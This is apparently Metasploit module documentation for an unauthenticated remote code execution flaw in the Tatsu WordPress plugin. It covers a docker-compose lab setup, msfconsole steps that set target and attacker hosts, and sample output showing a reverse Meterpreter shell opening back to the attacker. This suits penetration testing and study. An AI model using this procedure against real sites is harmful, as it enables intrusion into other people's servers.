## Vulnerable Application This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerable version is below 3.3.11. The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory. Then module will trigger the payload by sending request with payload directory as URI. The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip) ## Verification Steps 1. Install the application 1.1 Create `docker-compose.yml` ```yaml services: wordpress: image: wordpress:6.3.2 restart: always ports: - 5555:80 environment: WORDPRESS_DB_HOST: db WORDPRESS_DB_USER: ms WORDPRESS_DB_PASSWORD: supersecret WORDPRESS_DB_NAME: proof_of_concept volumes: - wordpress:/var/www/html - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini db: image: mysql:5.7 restart: always environment: MYSQL_DATABASE: proof_of_concept MYSQL_USER: ms MYSQL_PASSWORD: supersecret MYSQL_ROOT_PASSWORD: supersecret volumes: - db:/var/lib/mysql volumes: wordpress: db: ``` 1.2 Download [plugin](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip) 1.3 Install the plugin in Wordpress admin portal 2. `msfconsole` 3. `use multi/http/wp_tatsu_rce` 4. `set RHOST [target IP]` 5. `set RPORT [target PORT]` 6. `set LHOST [attacker's IP]` 7. `set LPORT [attacker's port]` ## Options ## Scenarios Vulnerable version is <= 3.3.11. ``` `msf exploit(multi/http/wp_tatsu_rce) > run [*] Started reverse TCP handler on 192.168.168.128:4444 [*] Sending stage (40004 bytes) to 172.18.0.2 [*] Meterpreter session 2 opened (192.168.168.128:4444 -> 172.18.0.2:37718) at 2025-06-11 18:59:35 +0200 [*] Starting interaction with 2... meterpreter > sysinfo Computer : ff0d55ec29bf OS : Linux ff0d55ec29bf 6.12.10-76061203-generic #202412060638~1748542656~22.04~663e4dc SMP PREEMPT_DYNAMIC Thu M x86_64 Meterpreter : php/linux meterpreter > ```